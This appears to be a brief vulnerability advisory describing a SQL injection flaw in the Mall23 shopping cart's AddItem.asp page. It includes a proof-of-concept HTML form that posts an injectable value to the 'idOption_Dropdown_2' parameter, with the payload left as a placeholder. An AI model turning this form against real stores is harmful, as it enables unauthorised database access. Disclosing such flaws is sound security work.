|
Mall23 AddItem.ASP SQL Injection Vulnerability
No exploit is required. The following proof of concept is available: <form action="http://www.example.com/m23Basket/AddItem.asp?idProduct=6" method="POST"> <input type="hidden" name="idOption_Dropdown_2" value="'[SQL INJECTION]"> <input type="Submit" name="submit" value="Test Exploit"> </form> |
|
|
Privacy Statement |